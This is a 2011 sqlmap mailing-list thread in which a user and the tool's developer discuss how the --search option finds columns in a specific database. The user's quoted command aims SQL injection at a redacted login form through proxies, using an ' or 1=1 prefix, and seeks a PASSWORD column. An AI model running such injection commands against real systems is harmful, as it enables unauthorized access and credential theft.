Re: [sqlmap-users] how to search for column name in a specific database using '--search' ?
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] how to search for column name in a specific database using '--search' ?
|
From: Miroslav S. <mir...@gm...> - 2011-12-02 17:34:33
|
This is a Oracle specific problem. Have to see how to properly deal with it. Kind regards 2011/12/2 CoeTs7 <tm...@ho...> > hi, > thx for you reply, but it doesn't seen to work that way on my box: > # proxychains svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmapsqlmap-dev 2>/dev/null > ProxyChains-3.1 (http://proxychains.sf.net) > Checked out revision 4564. > #./sqlmap.py -u 'http://xx.cfm' --data "xx=2&vLoginName=kahao" -p > vLoginName --technique b --text-only --suffix " -- s" --prefix="' or 1=1 " > --string "<b>" --timeout 100 --proxy 'http://192.168.1.12:8080' --search > -D 'GVDBA' -C 'PASSWORD' > ........omit.......... > do you want sqlmap to consider provided column(s): > [1] as LIKE column names (default) > [2] as exact column names > > > [06:29:01] [INFO] searching columns like 'PASSWORD' > [06:29:01] [INFO] fetching number of tables containing columns like > 'PASSWORD' in database 'USERS' > > i delete ./output/xxx.com and try this again, but it still run this way. > anything wrong with my operation? > > ------------------------------ > Date: Fri, 2 Dec 2011 14:27:35 +0100 > Subject: Re: [sqlmap-users] how to search for column name in a specific > database using '--search' ? > From: mir...@gm... > To: tm...@ho... > CC: sql...@li... > > Hi. > > First of all you can't use '%PASSWORD%' if you want to search for > identifiers LIKE 'PASSWORD'. In your case just put: -D authdb --search -C > PASSWORD. > > With the last commit (r4563) there is an upgrade in --search mechanism > that will more suite your needs. > > Now the lowest denominator dictates what is going to be searched. So: > --search -D .. -T .. -C .. will search for column(s) > --search -D .. -C .. will search for column(s) > --search -D .. -T .. will search for table(s) > --search -D .. will search for db(s) > ... > > Kind regards, > Miroslav Stampar > > On Fri, Dec 2, 2011 at 1:50 PM, Miroslav Stampar < > mir...@gm...> wrote: > > Hi. > > You are right. The lowest common denominator should be searched for with > --search (in this case that's column). Going to modify it and report back. > > Kind regards, > Miroslav Stampar > > 2011/12/2 CoeTs7 <tm...@ho...> > > hi all. i'm wondering if there's a way to search for column name in a > specific database while using '--search' ? > i've tried '-D authdb --search -C "%PASSWORD%"' but sqlmap think that i'm > trying to search a database named "authdb" and a column named like > 'password' . I am sure that the password i want to know is in the database > 'authdb' so i don't want to waste time searching in other dbs. > Is there any way i can do this? > thx a lot. > > > ------------------------------------------------------------------------------ > All the data continuously generated in your IT infrastructure > contains a definitive record of customers, application performance, > security threats, fraudulent activity, and more. Splunk takes this > data and makes sense of it. IT sense. And common sense. > http://p.sf.net/sfu/splunk-novd2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > -- > Miroslav Stampar > http://about.me/stamparm > > > > > -- > Miroslav Stampar > http://about.me/stamparm > -- Miroslav Stampar http://about.me/stamparm |
